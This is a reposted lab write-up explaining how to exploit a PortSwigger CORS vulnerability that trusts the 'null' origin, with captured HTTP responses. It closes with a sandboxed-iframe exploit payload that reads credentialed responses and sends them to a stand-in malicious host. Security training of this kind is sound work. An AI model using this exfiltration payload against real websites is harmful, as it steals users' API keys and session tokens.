An Interest In:
Web News this Week
- April 19, 2024
- April 18, 2024
- April 17, 2024
- April 16, 2024
- April 15, 2024
- April 14, 2024
- April 13, 2024
Portswiggers lab write up: CORS vulnerability with trusted null origin
In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the "null" origin to obtain a user's private credentials.
Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails
that fetches the user's API key:
HTTP/1.1 200 OKAccess-Control-Allow-Credentials: trueContent-Type: application/json; charset=utf-8Connection: closeContent-Length: 149{ "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ]}
We can see that the Access-Control-Allow-Credentials: true
is present, let's try to duplicate this request and change the Origin header to something like Origin: <https://example.com
> and see if this value is reflected, the resulting response will be something like this:
HTTP/1.1 200 OKAccess-Control-Allow-Credentials: trueContent-Type: application/json; charset=utf-8Connection: closeContent-Length: 149{ "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ]}
The Origin set in the request headers is not present in the Access-Control-Allow-Origin
response headers, this could mean that the server does not have CORS vulnerabilities, let's try setting the Origin
header to null
:
HTTP/1.1 200 OKAccess-Control-Allow-Origin: nullAccess-Control-Allow-Credentials: trueContent-Type: application/json; charset=utf-8Connection: closeContent-Length: 149{ "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ]}
The null
Origin set in the request headers is present in the Access-Control-Allow-Origin
response headers, this confirms us that this request has a CORS vulnerability via null
origin, let's use the reading material's sandboxed iframe template to craft our exploit so that the request is sent with the Origin
header set to null
:
<html><iframe sandbox='allow-scripts allow-top-navigation allow-forms' src=\"data:text/html<script>,var req = new XMLHttpRequest();req.onload = reqListener;req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);req.withCredentials = true;req.send();function reqListener() { location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);};</script>\"></iframe></html>
Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin
Original Link: https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin-4g9c
Dev To
An online community for sharing and discovering great ideas, having debates, and making friendsMore About this Source Visit Dev To